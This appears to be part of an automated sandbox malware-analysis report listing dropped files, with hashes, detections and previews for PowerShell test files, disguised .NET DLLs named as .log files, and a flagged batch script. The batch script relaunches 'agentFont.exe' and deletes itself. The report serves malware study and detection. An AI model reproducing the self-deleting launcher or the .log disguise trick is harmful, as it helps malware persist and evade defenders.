                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huvrcz15.33s.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipwfg00i.iqk.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2geu1z1.zjn.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lj5ylp4d.333.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzx3v4ca.zbc.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkkd1mjr.puv.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxm1vf3x.wva.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm21glfk.tym.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyvjnu4e.4x0.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtyvsfcc.xcn.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvybjmni.2fh.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjqbcd54.nym.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t21unziz.bsc.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_us05jypg.0j5.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzceiqxa.zpt.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zk0vhbc1.wfo.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\xjouGdPJBa

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):25
                                                                                  Entropy (8bit):4.373660689688184
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:IzbMLR3Uim:ObMl3U9
                                                                                  MD5:BC85B166DBF6DE71578060BC34F2ED22
                                                                                  SHA1:31BCA4C9868169F6591BCD08E22777AA157D7674
                                                                                  SHA-256:BDF6D98F71FA5B7D390C6A8CD128CD7AA5C7F6A1E26B1E1AD8DC655BEE2C3A62
                                                                                  SHA-512:85152D00B781BB572B3C4351C495A361153B7C58DEC8B09CB721A1A09B7A73F7A3641C51A9F3B15785E56B755003D9BE7472A87D7528ADAD1743CFD4B1D18A5D
                                                                                  Malicious:false
                                                                                  Preview:whRVciLjkNK7fr4v77gGqGmtb

                                                                                  C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):169
                                                                                  Entropy (8bit):5.143507364906635
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mwqWyAJAeJJbRNSBktKcKZG1t+kiE2J5xAIgT59zKn:hCRLuVFOOr+DE0yA7NSKOZG1wkn23fgK
                                                                                  MD5:A7A9458247350E51F854DD28C7E2D4FB
                                                                                  SHA1:668444478B642951D2C92501AAE9ABA51242FE9B
                                                                                  SHA-256:E58D6299CB659804BD2B28D28EFFB12E90CCD0F39BC8FE295415050C32CF2727
                                                                                  SHA-512:979F5C0DAF78D0B44CB4C1F8AE30D3354D128E0F5F874B369299170C5E127EB4762626464C2B0CA7276E6CE3DEF66C7E4F6E7F9E6B450F51C0BD8492D15C1DAE
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\mshypercomponentSavesdll\agentFont.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\z0MvDYgz73.bat"

                                                                                  C:\Users\user\Desktop\AnJfWYZZ.log

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22016
                                                                                  Entropy (8bit):5.41854385721431
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                  • Filename: KzLetzDiM8.exe, Detection: malicious, Browse
                                                                                  • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                  • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                                                  • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                  • Filename: CPNSQusnwC.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: hjgesadfseawd.exe, Detection: malicious, Browse
                                                                                  • Filename: adjthjawdth.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\HOfmkikL.log

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\HhjUFBqv.log

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\cvxIvGPF.log

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.519109060441589
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\kZFyeAfm.log

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22016
                                                                                  Entropy (8bit):5.41854385721431
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\rEqPmwUs.log

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.519109060441589
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                  C:\Windows\INF\1668b549825c2a

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (978), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):978
                                                                                  Entropy (8bit):5.913722445226472
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:/kJfbPL65SW58lYNP5wPGJotHljlZJw/fTB3utYJwh2aelVHV4e:/obDNmNPGP9PlsfTB3uuJwFIVHV4e
                                                                                  MD5:176794E1AC002B6E3176416929D45295
                                                                                  SHA1:DF2F1CD1AFB0CEB04202907707BAC58B930E97DA
                                                                                  SHA-256:8D0F567BE65A2C84FC17DE67C616A40076C9953698BE17FFACA0B253F1C074F0
